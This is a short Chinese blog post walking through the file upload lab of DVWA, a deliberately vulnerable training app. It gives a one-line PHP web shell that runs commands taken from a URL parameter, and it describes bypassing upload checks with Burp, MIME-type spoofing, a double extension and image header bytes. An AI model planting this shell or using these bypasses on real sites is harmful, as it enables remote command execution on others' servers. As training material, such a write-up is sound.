DVWA--文件上传

开门见山

 

 

1. 准备一个shell

 

<?php echo shell_exec($_GET['cmd']);?>

 

 

 

2. 上传文件

 

 

 

3. 利用shell

 

 

 

4. Burp抓包,1是文件大小,2是文件类型

 

 

 

5. mimetype判断文件类型

 

 

 

6. 使用1.php.jpg 绕过一些文件后缀检查

 

 

 

7. 图片1代码前几个字节标志文件的类型(jpg或者png),可以删除后面的内容,并替换成shell代码<?php echo shell_exec($_GET['cmd']);?>

 

 

 

 

posted @ 2020-02-06 15:24  joker0xxx3  阅读(233)  评论(0编辑  收藏  举报